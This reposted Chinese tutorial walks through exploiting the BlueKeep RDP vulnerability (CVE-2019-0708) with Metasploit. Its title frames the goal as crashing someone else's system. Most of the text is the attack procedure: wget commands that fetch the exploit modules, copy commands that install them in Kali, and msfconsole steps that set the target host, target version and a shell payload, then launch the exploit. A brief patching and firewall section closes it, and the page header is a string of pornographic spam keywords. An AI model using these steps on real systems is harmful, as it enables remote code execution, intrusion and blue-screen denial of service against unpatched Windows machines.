日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 运维知识 > windows >内容正文

windows

vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机

發(fā)布時(shí)間:2024/9/27 windows 50 豆豆
生活随笔 收集整理的這篇文章主要介紹了 vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

漏洞背景:

Windows 系列服務(wù)器于 2019 年 5 月 15 號(hào),被爆出高危漏洞,該服務(wù)器漏洞利用方式是通過(guò)遠(yuǎn)程桌面端口3389進(jìn)行攻擊的。這個(gè)漏洞是今年來(lái)說(shuō)危害嚴(yán)重性最大的漏洞,跟之前的永恒之藍(lán)病毒差不多。

2019年9月7日晚上凌晨 1 點(diǎn)左右,metaspolit 官方更新了漏洞利用程序。

漏洞危害:

CVE-2019-0708 漏洞是通過(guò)檢查用戶的身份認(rèn)證,導(dǎo)致可以繞過(guò)認(rèn)證,不用任何的交互,直接通過(guò) rdp 協(xié)議進(jìn)行連接發(fā)送惡意代碼執(zhí)行命令到服務(wù)器中去。如果被攻擊者利用,會(huì)導(dǎo)致服務(wù)器被黑客入侵、感染病毒,像WannaCry永恒之藍(lán)一樣大規(guī)模的感染。

漏洞影響范圍:

該漏洞影響范圍較廣,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系統(tǒng)都會(huì)遭到攻擊。

漏洞復(fù)現(xiàn)環(huán)境準(zhǔn)備:

CVE 2019-0708的exploit地址:

https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0

ruby腳本地址:

https://github.com/rapid7/metasploit-framework/pull/12283/files

wget下載:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

復(fù)制到KALl MSF中

rdp.rb

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cve_2019_0708_bluekeep.rb

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

rdp_scanner.rb

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cve_2019_0708_bluekeep_rce.rb

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

開(kāi)始復(fù)現(xiàn):

攻擊命令

使用msfconsole

進(jìn)入后使用reload_all重新加載模塊

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

使用info查看工具相關(guān)信息以及設(shè)置

set RHOSTS 設(shè)置IP

set RPORT 設(shè)置RDP端口號(hào)

使用set target ID設(shè)置受害機(jī)機(jī)器

使用payload設(shè)置攻擊載荷

使用exploit開(kāi)始攻擊,等待建立連接

Step1.打開(kāi)kali,下載4個(gè)模塊

Step2. 復(fù)制到MSF文件中

如果出現(xiàn)無(wú)法找到rdp目錄,用mkdir創(chuàng)建一個(gè)目錄,運(yùn)行文章上的4個(gè)復(fù)制命令到msf文件夾中。

Step3.運(yùn)行msfconsole,重新加載模塊,use連接模塊

輸入”msfconsole”啟動(dòng)msf,然后輸入” reload_all”重新加載模塊

進(jìn)入msf后,輸入search 0708 搜索攻擊模塊。(小技巧:直接use 編號(hào) 就能連接)

連接編號(hào)為3的攻擊模塊cve_2019_0708_bluekeep_rce

命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

當(dāng)連接攻擊模塊后查看攻擊設(shè)置命令: show options

RHOSTS=目標(biāo)

RPORT=端口

Target: 目標(biāo)版本對(duì)應(yīng)的id

提示:

Target 1 =Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

Target2= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)

Target3=Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

Target4= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

設(shè)置目標(biāo)ip:set RHOSTS 192.168.1.192(測(cè)試機(jī)器ip 目標(biāo)為:win7)

設(shè)置攻擊版本: set target 3 (目標(biāo)機(jī)器在vm上測(cè)試的)

重要一點(diǎn):set payload windows/x64/shell_bitcp設(shè)置攻擊載荷(不設(shè)置情況可能攻擊失敗)

設(shè)置好目標(biāo)ip以及targer運(yùn)行:exploit 開(kāi)始攻擊

經(jīng)過(guò)測(cè)試發(fā)現(xiàn)會(huì)導(dǎo)致大部分機(jī)器藍(lán)屏,因?yàn)榘l(fā)布的exp為閹割版,所以大家請(qǐng)謹(jǐn)慎測(cè)試。

修復(fù)方案

1、最簡(jiǎn)便的方法就是安裝一個(gè)安全管家,比如火絨、360之類(lèi)的

2、把系統(tǒng)的自動(dòng)更新打開(kāi)或者到微軟官網(wǎng)下載補(bǔ)丁

3、設(shè)置防火墻規(guī)則,并關(guān)閉3389端口

總結(jié)

以上是生活随笔為你收集整理的vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。